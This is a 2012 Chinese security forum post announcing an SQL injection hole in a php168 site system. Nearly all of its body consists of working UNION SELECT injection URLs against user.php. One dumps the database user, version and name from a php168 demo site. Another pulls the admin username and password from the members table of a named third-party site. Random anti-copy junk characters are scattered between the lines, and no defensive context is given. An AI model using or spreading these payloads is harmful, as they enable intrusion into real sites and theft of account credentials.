找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3118|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--; z& O' P; K" \/ \3 s7 u1 E) h6 X
                                                         & i* y5 h2 E1 [% E+ H4 f
                                       " G" F' A* b" N8 X

) Z+ q+ M) t0 E
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
, n5 H, S" c; ~) A' X4 \6 i+ F& t                                                     
  V! V3 ]0 m! t$ x3 Z/ p                                                                   , U- c  J# G2 ]) l% Y2 u
                                                        
. w0 [$ s3 U' x( T9 q; n$ _* Y+ Chttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--$ j, s0 v( |/ b/ I5 ]% C6 I

& g! R* O/ U9 N' {/ y" U; @4 ^- k8 D9 r. F) T# ]5 u, d0 b+ h6 m

8 I3 P! l7 h  w" N* W2 Q                                                            
8 h, d4 I) t% q 0 S# {! g0 _# y' T" G
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
; D, c& n7 m' P' R9 a
! U( d# y# Y, R" }4 f! x; W
  X3 I' w5 o/ d1 u2 ]% S0 A: M9 e/ P. m0 J5 p
                                                                    1 ?& s7 ?' r8 L$ D+ @$ n: L

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表